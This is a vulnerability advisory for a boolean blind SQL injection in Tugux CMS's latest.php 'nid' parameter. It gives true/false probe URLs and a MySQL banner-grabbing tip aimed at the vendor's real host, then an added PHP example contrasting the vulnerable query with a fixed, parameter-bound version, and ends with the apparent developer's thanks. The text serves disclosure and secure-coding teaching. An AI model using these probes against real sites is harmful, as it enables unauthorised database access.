===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: Blind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False
[+] http://host:3306 <= the browser downloads the server banner as a file; save it and open it with c++ or wordpad and it will show the mysql version
[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (MySQL version 5.0.92) :D
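Added example (not Tugux CMS source code): the coding pattern that makes a parameter like nid boolean-blind injectable, next to a fixed version that validates the type and binds the value. The news table, its columns and the in-memory SQLite database are assumptions for illustration.

```php
<?php
// Added example, not the project's own code. Table and column names are
// assumptions; SQLite in memory stands in for the CMS database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE news (nid INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO news VALUES (9, 'Hello world')");

// VULNERABLE pattern: the query string value is concatenated straight into
// SQL. The page shows a row for a true condition and nothing for a false one
// (the True/False behaviour in the advisory), so an attacker can ask the
// database yes/no questions through nid without ever seeing an error.
function latestVulnerable(PDO $pdo, string $nid): ?array
{
    $sql = "SELECT title FROM news WHERE nid = " . $nid;
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// FIXED pattern: reject anything that is not a positive integer, then bind
// the value so the database driver never parses it as SQL.
function latestFixed(PDO $pdo, string $nid): ?array
{
    $id = filter_var($nid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller answers with HTTP 400, not a query
    }
    $stmt = $pdo->prepare("SELECT title FROM news WHERE nid = :nid");
    $stmt->bindValue(':nid', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs mirroring the advisory's True/False probe.
var_dump(latestVulnerable($pdo, '9'));   // array with title: the "True" page
var_dump(latestVulnerable($pdo, '-9'));  // NULL: the "False" page
var_dump(latestFixed($pdo, '9'));        // array with title
var_dump(latestFixed($pdo, '-9'));       // NULL, rejected before any SQL runs
var_dump(latestFixed($pdo, '9 abc'));    // NULL, rejected before any SQL runs
```

With the fixed version every non-integer nid takes the same code path, so the response no longer differs depending on what the database evaluates.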
====================================================================
Nothing Impossible In This World Even Nobody's Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Hi, I am the developer of the Tugux CMS. Thanks for telling me about the security fix. I fixed the security leak to prevent Tugux CMS from SQL injection. Once again, thanks. If you want to help us improve Tugux CMS, you can join our team.
My email is yousaf@tugux.com